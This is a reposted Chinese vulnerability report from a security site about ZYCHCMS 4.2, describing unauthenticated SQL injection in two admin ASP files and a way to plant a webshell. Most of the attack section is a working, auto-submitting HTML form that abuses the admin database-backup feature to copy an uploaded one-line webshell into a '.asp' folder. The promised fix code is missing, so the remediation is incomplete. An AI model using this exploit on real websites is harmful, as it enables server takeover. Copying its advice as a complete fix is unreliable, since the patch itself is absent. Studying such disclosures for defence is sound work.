首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
来源:www.wooyun.org 作者:无敌金创药 发布时间:2012-09-18  

简要描述:

①SQL注射漏洞
②后台拿WBSHELL

详细说明:

影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
①SQL注射漏洞
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
漏洞原因:未过滤
漏洞代码:
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。


②后台拿WBSHELL
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
这里在网上找了一个,改了下,将就着用。看效果如图2

以下是代码本地提交代码

<form method="post" action="http://localhost/admin/Manage_backup.asp?action=Backup" name=add>

<!--eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup-->
        <tr>
          <td height="30" background="images/bg_list.gif"><div style="padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left">备份数据库</div></td>
        </tr>
        <tr>
          <td bgcolor="#FFFFFF"><span class="back_southidc">
           
            </span>
            <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" >
              <tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#F1F5F8'" bgcolor="#F1F5F8" >
                <td height="25" width="30%" class="td"><div align="left">当前数据库路径</div></td>
                <td width="70%" class="td">
                  <div align="left">
                    <input type="text" size="30" name="DBpath" value="此处为你在其网站上传的图片格式一句话路径" /> 

<!--eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>               
                    <input type="hidden" size="50" name="bkfolder" value="123.asp" />               
                  </div></td>
              </tr>
              <tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#FFFFFF'" bgcolor="#FFFFFF">
                <td height="25" width="30%" class="td"><div align="left">备份数据库名称</div></td>
                <td class="td"><div align="left">
                      <input type="text" size="30" name="bkDBname" value="4.mdb" />
                  [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
              </tr>
              <tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#F1F5F8'" bgcolor="#F1F5F8">
                <td height="25" width="30%" class="td"><div align="left"></div></td>
                <td class="td"><div align="left">
                  <input type="submit" value="确定备份" class="btn"/>
                </div></td>
              </tr>
          </table></td></tr></form>
      </table>
      </td>
</tr>
</table>
<script>  
document.all.add.submit();  
</script>

 

漏洞证明:

 

漏洞证明:我用官方演示站点做测试,如图1
备份一句话

 

修复方案:

修复方法:在文件开头加入代码


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·ECMall 2.x 两枚注射
·ShopEx后台历遍目录漏洞
·微信任意用户密码修改漏洞
·shopex前台普通用户getshell最新
·phpcms 2008多个漏洞 (可getshel
·SAE云服务安全沙箱绕过5(强制修
·XSS蠕虫与QQ系统消息推送双剑合
·SAE云服务安全沙箱绕过4(绕过文
·SAE云服务安全沙箱绕过3(绕过命
·phpcms v9 后台上传 webshell
·dedeCMS 最新注入漏洞一枚
·ecshop gbk存在宽字符注入漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved